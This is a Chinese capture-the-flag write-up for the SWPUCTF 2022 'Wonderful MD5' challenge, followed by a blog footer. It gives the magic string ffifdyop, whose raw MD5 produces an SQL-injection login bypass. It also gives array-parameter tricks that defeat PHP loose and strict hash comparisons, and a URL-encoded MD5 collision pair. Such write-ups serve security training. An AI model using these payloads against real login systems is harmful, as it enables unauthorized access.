[SWPUCTF 2022 新生赛]奇妙的MD5 wp
题目页面:
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第1张](/upload/website_attach/202411/1_FVP6BJ7J8VCPBTT9.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第1张")
提示:可曾听过ctf 中一个奇妙的字符串。
奇妙的字符串
奇妙的字符串,又跟 MD5 有关,我只知道两个:
一个是 MD5 加密后弱比较等于自身,这个字符串是 0e215962017 :
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第2张](/upload/website_attach/202411/1_24G7NF8UCXFFFPZ9.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第2张")
另一个是 MD5 加密后变成万能密码,这个字符串是 ffifdyop :
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第3张](/upload/website_attach/202411/1_AC9QCFQK3KZN6XZ6.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第3张")
使用第二个字符串成功通过。
线索在源码里
通过上一关后,跳转到如下页面:
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第4张](/upload/website_attach/202411/1_KKBBDN6829N9AZ4J.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第4张")
查看源代码:
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第5张](/upload/website_attach/202411/1_ZZCRGM3G57JFEFKE.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第5张")
MD5 弱比较
方法很多,这里用数组绕过,GET 传参:
?x[]=1&y[]=2
MD5 强比较
通过上一关后,跳转到新页面,内容如下:
使用数组绕过,POST 传参 payload 如下:
wqh[]=1&dsy[]=2返回结果:
使用 MD5 碰撞,POST 传参 payload 如下:
wqh=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&dsy=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2建议用 burp 发包,返回结果:
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第6张](/upload/website_attach/202411/1_HHNMZ9MKA2RBM6VB.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第6张")
![[SWPUCTF 2022 新生赛]奇妙的MD5,在这里插入图片描述,第7张](/upload/website_attach/202411/1_4Y879V6KZUHZ2YD4.jpeg "[SWPUCTF 2022 新生赛]奇妙的MD5,第7张")
猜你喜欢
- 4小时前HDFS 原理 详解
- 4小时前flex布局优化(两端对齐,从左至右)
- 4小时前JavaWeb期末考试复习资料
- 4小时前Session详解,学习 Session对象一篇文章就够了
- 4小时前阿里云OSS存储图片在上传的时候设置过期时间
- 4小时前HTTPS:如何确保您的网站数据传输安全?
- 4小时前部署YUM仓库及NFS共享存储
- 4小时前TDengine Kafka Connector将 Kafka 中指定 topic 的数据(批量或实时)同步到 TDengine
- 4小时前kafka服务器连接出现:[NetworkClient.java:935] [Producer clientId=producer-1] Node -1 disconnected原因分析
- 4小时前分布式消息队列:Kafka vs RabbitMQ vs ActiveMQ
网友评论
- 搜索
- 最新文章
- 热门文章